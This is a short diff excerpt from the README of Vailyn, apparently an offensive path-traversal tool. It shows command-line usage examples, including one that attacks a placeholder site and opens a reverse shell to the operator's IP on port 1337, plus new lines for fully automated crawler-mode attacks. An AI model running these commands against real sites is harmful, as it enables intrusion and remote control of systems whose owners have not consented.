VainlyStrain/Vailyn/README.md

 * Attack, but I want a reverse shell on port 1337:
 `$ Vailyn -v "http://site.com/download.php" -a 1 -l dicts/files dicts/dirs -j MY.IP.IS.XX 1337`
 (will start a ncat listener for you)

+* Full automation in crawler mode:
+`$ Vailyn -v "http://root-url.site" -a 5 -l ANY ANY` _you can also specify depths, lookup file here_

+* Full automation, but Arjun needs `--stable`:
+`$ Vailyn -v "http://root-url.site" -a 5 -l ANY ANY -k ANY`

 ### Demo